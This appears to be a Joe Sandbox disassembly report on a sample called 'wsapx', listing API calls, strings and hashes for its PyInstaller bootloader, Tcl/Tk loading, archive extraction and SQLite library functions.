Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: D8515432A1864287E721FF25F8C15A9E760BBD8FA4FC44135EA4D47696DF3CE4428B60

Function 00007FF7C71B5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5830
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5842
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5879
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B588B
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58A4
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58B6
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58CF
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58E1
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B58FD
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B590F
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B592B
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B593D
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5959
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B596B
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5987
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B5999
GetProcAddress.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59B5
GetLastError.KERNEL32(?,00007FF7C71B64BF,?,00007FF7C71B336E), ref: 00007FF7C71B59C7

Strings

PyMem_RawFree, xrefs: 00007FF7C71B5C8B, 00007FF7C71B5CAD
PyRun_SimpleStringFlags, xrefs: 00007FF7C71B5DFB, 00007FF7C71B5E1D
PyImport_AddModule, xrefs: 00007FF7C71B5BD3, 00007FF7C71B5BF5
GetProcAddress, xrefs: 00007FF7C71B5858
PySys_GetObject, xrefs: 00007FF7C71B5E57, 00007FF7C71B5E79
PyConfig_InitIsolatedConfig, xrefs: 00007FF7C71B59AB, 00007FF7C71B59CD
Py_DecodeLocale, xrefs: 00007FF7C71B586F, 00007FF7C71B5891
PyConfig_SetBytesString, xrefs: 00007FF7C71B5A07, 00007FF7C71B5A29
Py_DecRef, xrefs: 00007FF7C71B5826, 00007FF7C71B5848
PyMarshal_ReadObjectFromString, xrefs: 00007FF7C71B5C5D, 00007FF7C71B5C7F
PyConfig_SetString, xrefs: 00007FF7C71B5A35, 00007FF7C71B5A57
PyErr_Restore, xrefs: 00007FF7C71B5B77, 00007FF7C71B5B99
PyUnicode_FromFormat, xrefs: 00007FF7C71B5F3D, 00007FF7C71B5F5F
Py_InitializeFromConfig, xrefs: 00007FF7C71B58F3, 00007FF7C71B5915
PyObject_Str, xrefs: 00007FF7C71B5D9F, 00007FF7C71B5DC1
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7C71B5DCD, 00007FF7C71B5DEF
PyConfig_Read, xrefs: 00007FF7C71B59D9, 00007FF7C71B59FB
PyEval_EvalCode, xrefs: 00007FF7C71B5BA5, 00007FF7C71B5BC7
PyUnicode_FromString, xrefs: 00007FF7C71B5F6B, 00007FF7C71B5F8D
PyErr_Clear, xrefs: 00007FF7C71B5A91, 00007FF7C71B5AB3
PyConfig_Clear, xrefs: 00007FF7C71B597D, 00007FF7C71B599F
Py_PreInitialize, xrefs: 00007FF7C71B594F, 00007FF7C71B5971
PyErr_NormalizeException, xrefs: 00007FF7C71B5AED, 00007FF7C71B5B0F
PySys_SetObject, xrefs: 00007FF7C71B5E85, 00007FF7C71B5EA7
Py_IsInitialized, xrefs: 00007FF7C71B5921, 00007FF7C71B5943
PyObject_CallFunction, xrefs: 00007FF7C71B5CE7, 00007FF7C71B5D09
PyStatus_Exception, xrefs: 00007FF7C71B5E29, 00007FF7C71B5E4B
PyImport_ExecCodeModule, xrefs: 00007FF7C71B5C01, 00007FF7C71B5C23
Failed to get address for %hs, xrefs: 00007FF7C71B5851
PyConfig_SetWideStringList, xrefs: 00007FF7C71B5A63, 00007FF7C71B5A85
Py_Finalize, xrefs: 00007FF7C71B58C5, 00007FF7C71B58E7
PyUnicode_Decode, xrefs: 00007FF7C71B5EE1, 00007FF7C71B5F03
PyImport_ImportModule, xrefs: 00007FF7C71B5C2F, 00007FF7C71B5C51
PyObject_CallFunctionObjArgs, xrefs: 00007FF7C71B5D15, 00007FF7C71B5D37
PyObject_SetAttrString, xrefs: 00007FF7C71B5D71, 00007FF7C71B5D93
PyUnicode_Replace, xrefs: 00007FF7C71B5FC7, 00007FF7C71B5FE9
PyErr_Occurred, xrefs: 00007FF7C71B5B1B, 00007FF7C71B5B3D
Py_ExitStatusException, xrefs: 00007FF7C71B589A, 00007FF7C71B58BC
PyUnicode_DecodeFSDefault, xrefs: 00007FF7C71B5F0F, 00007FF7C71B5F31
PyErr_Print, xrefs: 00007FF7C71B5B49, 00007FF7C71B5B6B
PyUnicode_AsUTF8, xrefs: 00007FF7C71B5EB3, 00007FF7C71B5ED5
PyObject_GetAttrString, xrefs: 00007FF7C71B5D43, 00007FF7C71B5D65
PyUnicode_Join, xrefs: 00007FF7C71B5F99, 00007FF7C71B5FBB
PyErr_Fetch, xrefs: 00007FF7C71B5ABF, 00007FF7C71B5AE1
PyModule_GetDict, xrefs: 00007FF7C71B5CB9, 00007FF7C71B5CDB

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 7dec1d2d26a0ae70cfd4d748e6ddabc666cda4741c6470c63d478efb003596ed
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: E122C564949B4787FA16BF55B8945B4A3B1AFE8FB0FC45539C81F02260FF3CA14A9630

Function 00007FF7C71B76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7C71B76C7
GetLastError.KERNEL32 ref: 00007FF7C71B76D9
GetProcAddress.KERNEL32 ref: 00007FF7C71B7715
GetLastError.KERNEL32 ref: 00007FF7C71B7727
GetProcAddress.KERNEL32 ref: 00007FF7C71B7740
GetLastError.KERNEL32 ref: 00007FF7C71B7752
GetProcAddress.KERNEL32 ref: 00007FF7C71B776B
GetLastError.KERNEL32 ref: 00007FF7C71B777D
GetProcAddress.KERNEL32 ref: 00007FF7C71B7799
GetLastError.KERNEL32 ref: 00007FF7C71B77AB
GetProcAddress.KERNEL32 ref: 00007FF7C71B77C7
GetLastError.KERNEL32 ref: 00007FF7C71B77D9
GetProcAddress.KERNEL32 ref: 00007FF7C71B77F5
GetLastError.KERNEL32 ref: 00007FF7C71B7807
GetProcAddress.KERNEL32 ref: 00007FF7C71B7823
GetLastError.KERNEL32 ref: 00007FF7C71B7835
GetProcAddress.KERNEL32 ref: 00007FF7C71B7851
GetLastError.KERNEL32 ref: 00007FF7C71B7863

Strings

Tcl_CreateThread, xrefs: 00007FF7C71B7819, 00007FF7C71B783B
Tcl_ConditionWait, xrefs: 00007FF7C71B7989, 00007FF7C71B79AB
Tcl_Finalize, xrefs: 00007FF7C71B778F, 00007FF7C71B77B1
GetProcAddress, xrefs: 00007FF7C71B76EF
Tcl_JoinThread, xrefs: 00007FF7C71B7875, 00007FF7C71B7897
Tcl_SetVar2, xrefs: 00007FF7C71B7A41, 00007FF7C71B7A63
Tcl_CreateInterp, xrefs: 00007FF7C71B770B, 00007FF7C71B772D
Tcl_FindExecutable, xrefs: 00007FF7C71B7736, 00007FF7C71B7758
Tcl_MutexUnlock, xrefs: 00007FF7C71B78D1, 00007FF7C71B78F3
Tcl_MutexFinalize, xrefs: 00007FF7C71B78FF, 00007FF7C71B7921
Tcl_Alloc, xrefs: 00007FF7C71B7C0D, 00007FF7C71B7C2F
Tcl_DoOneEvent, xrefs: 00007FF7C71B7761, 00007FF7C71B7783
Tcl_CreateObjCommand, xrefs: 00007FF7C71B7A6F, 00007FF7C71B7A91
Tcl_EvalFile, xrefs: 00007FF7C71B7B83, 00007FF7C71B7BA5
Tcl_DeleteInterp, xrefs: 00007FF7C71B77EB, 00007FF7C71B780D
Tcl_GetObjResult, xrefs: 00007FF7C71B7B55, 00007FF7C71B7B77
Tcl_EvalObjv, xrefs: 00007FF7C71B7BDF, 00007FF7C71B7C01
Tcl_ConditionFinalize, xrefs: 00007FF7C71B792D, 00007FF7C71B794F
Tcl_GetString, xrefs: 00007FF7C71B7A9D, 00007FF7C71B7ABF
Tcl_NewStringObj, xrefs: 00007FF7C71B7ACB, 00007FF7C71B7AED
Tcl_MutexLock, xrefs: 00007FF7C71B78A3, 00007FF7C71B78C5
Tcl_NewByteArrayObj, xrefs: 00007FF7C71B7AF9, 00007FF7C71B7B1B
Tcl_SetVar2Ex, xrefs: 00007FF7C71B7B27, 00007FF7C71B7B49
Failed to get address for %hs, xrefs: 00007FF7C71B76E8
Tcl_FinalizeThread, xrefs: 00007FF7C71B77BD, 00007FF7C71B77DF
Tcl_Init, xrefs: 00007FF7C71B76C0, 00007FF7C71B76DF
Tk_Init, xrefs: 00007FF7C71B7C69, 00007FF7C71B7C8B
Tcl_GetVar2, xrefs: 00007FF7C71B7A13, 00007FF7C71B7A35
Tcl_ConditionNotify, xrefs: 00007FF7C71B795B, 00007FF7C71B797D
Tcl_ThreadQueueEvent, xrefs: 00007FF7C71B79B7, 00007FF7C71B79D9
Tk_GetNumMainWindows, xrefs: 00007FF7C71B7C97, 00007FF7C71B7CB9
Tcl_EvalEx, xrefs: 00007FF7C71B7BB1, 00007FF7C71B7BD3
Tcl_Free, xrefs: 00007FF7C71B7C3B, 00007FF7C71B7C5D
Tcl_ThreadAlert, xrefs: 00007FF7C71B79E5, 00007FF7C71B7A07
Tcl_GetCurrentThread, xrefs: 00007FF7C71B7847, 00007FF7C71B7869

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: e44c84c5f4c6194a316a7a0326b91a82db1aba1e61f16489c3dffb044bcd3d5e
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 2302C56095DB0793FA56BF65B895578A270AFE8F74FC41436C85E02660EF3CB24B8630

Function 00007FF7C71B81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7C71B88A7,?,?,00000000,00007FF7C71B3CBB), ref: 00007FF7C71B821C

Part of subcall function 00007FF7C71B2810: MessageBoxW.USER32 ref: 00007FF7C71B28EA

Strings

\, xrefs: 00007FF7C71B8251
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7C71B8363
%.*s, xrefs: 00007FF7C71B82FC
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7C71B828D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7C71B81F3
CreateDirectory, xrefs: 00007FF7C71B836C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7C71B82C9
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7C71B8230

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
Instruction ID: f31e43f7cc1ecf0000b0a3952f4641eef8875ed9369c8e0ed40dc8d8bcd1f458
Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
Instruction Fuzzy Hash: D3516751A2864283FB51BF25F8926BAE261AFD4FA0FC44431DD4E83695EE2CE5078760

Function 00007FF7C71B1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to create symbolic link %s!, xrefs: 00007FF7C71B1622
fseek, xrefs: 00007FF7C71B16E1
fread, xrefs: 00007FF7C71B17E6
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7C71B17CA
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7C71B16DA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7C71B16A2
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7C71B1742
fwrite, xrefs: 00007FF7C71B17D1
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7C71B17DF
malloc, xrefs: 00007FF7C71B1749
Failed to extract %s: failed to open target file!, xrefs: 00007FF7C71B165C
fopen, xrefs: 00007FF7C71B1663

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 0a87ee3060ec78e21d6c2d3bfc048a27d307e8fd5641d8a78f43b3b0b6daa239
Instruction ID: e7174c52c80f606bb8701608f639d02b6bed5967f7e507e743bba792b976bae3
Opcode Fuzzy Hash: 0a87ee3060ec78e21d6c2d3bfc048a27d307e8fd5641d8a78f43b3b0b6daa239
Instruction Fuzzy Hash: E051BCA1B0864393EA20BF62B4411A9A3A1BFC4FB4FC04135EE1D47796DE3CE6579760

Function 00007FFD947BA080 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 384COMMON

Download Yara Rule

Strings

sqlite3_extension_init, xrefs: 00007FFD947BA0FF
lib, xrefs: 00007FFD947BA2C1
unable to open shared library [%.*s], xrefs: 00007FFD947BA67F
not authorized, xrefs: 00007FFD947BA0E8
sqlite3_, xrefs: 00007FFD947BA273
error during initialization: %s, xrefs: 00007FFD947BA436
no entry point [%s] in shared library [%s], xrefs: 00007FFD947BA50C
_init, xrefs: 00007FFD947BA36E
%s.%s, xrefs: 00007FFD947BA13C

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
Instruction ID: 0051b72bdce5920a9c83b23bd955b094e8bea21fdd888b376839fa9ec400d395
Opcode Fuzzy Hash: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
Instruction Fuzzy Hash: F602A371B09A8AC1EA799B91A4F427977A5FF46B84F44C235DE4E47292DF3CE844C380

Function 00007FF7C71B2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7C71B21AB
SelectObject.GDI32 ref: 00007FF7C71B21F2
DrawTextW.USER32 ref: 00007FF7C71B2215
SelectObject.GDI32 ref: 00007FF7C71B222B
ReleaseDC.USER32 ref: 00007FF7C71B223B
MoveWindow.USER32 ref: 00007FF7C71B228B
MoveWindow.USER32 ref: 00007FF7C71B22CB
MoveWindow.USER32 ref: 00007FF7C71B231E
MoveWindow.USER32 ref: 00007FF7C71B2366

Strings

P%, xrefs: 00007FF7C71B21FF

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: b69ec6ad47f99b26d8d78d5c386557fc31bd60fa7cc845e6c07e3b35e5390eb2
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 2351F536604BA187D634AF22B4581BAB7A1F798B61F004121EFDF43694DF3CD146CB20

Function 00007FF7C71B80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7C71B80EF
GetWindowLongPtrW.USER32 ref: 00007FF7C71B816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF7C71B8182
GetLastError.KERNEL32 ref: 00007FF7C71B818C
SetWindowLongPtrW.USER32 ref: 00007FF7C71B81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF7C71B8175

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 86d7806d4dccd00ecdf22ea55be2873d6fcdad52cfb7b10f5740765c9b675272
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 98218861B09A42C3E756AF7AF894179E251EFD8FB0F884131DE2E437D4DE2CD6528620

Function 00007FFD94622740 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFD94622768
__scrt_initialize_crt.LIBCMT ref: 00007FFD946227AD
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFD946227BA
_RTC_Initialize.LIBCMT ref: 00007FFD946227E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFD9462280E
__scrt_release_startup_lock.LIBCMT ref: 00007FFD94622839

Memory Dump Source

Source File: 00000002.00000002.2668800317.00007FFD94621000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFD94620000, based on PE: true

Associated: 00000002.00000002.2668762753.00007FFD94620000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94682000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946CE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946D2000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD946D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94734000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2668800317.00007FFD94737000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2669246979.00007FFD94738000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000002.00000002.2669284338.00007FFD9473A000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94620000_wsapx.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
Instruction ID: 1105e295ebf496d9ff97f3bc51aed169afd82ed6132a369453ca98aa86a0012b
Opcode Fuzzy Hash: ba629577db6599826cb9fb44cf19b8c727e776d8ab71a1e0ce86f35fe3adb7c8
Instruction Fuzzy Hash: C3817BA0F08247A6F6749BE6A4E12F92290AF47780F54C435D96CC77A7DE3CE845C710

Function 00007FFD94780670 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 487COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9478073C

Strings

cannot open virtual table: %s, xrefs: 00007FFD94780CDF
foreign key, xrefs: 00007FFD94780913
cannot open view: %s, xrefs: 00007FFD94780CCD
cannot open table without rowid: %s, xrefs: 00007FFD94780CD6
indexed, xrefs: 00007FFD94780960
cannot open %s column for writing, xrefs: 00007FFD94780C9B
out of memory, xrefs: 00007FFD947807A8
no such column: "%s", xrefs: 00007FFD94780CB9

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
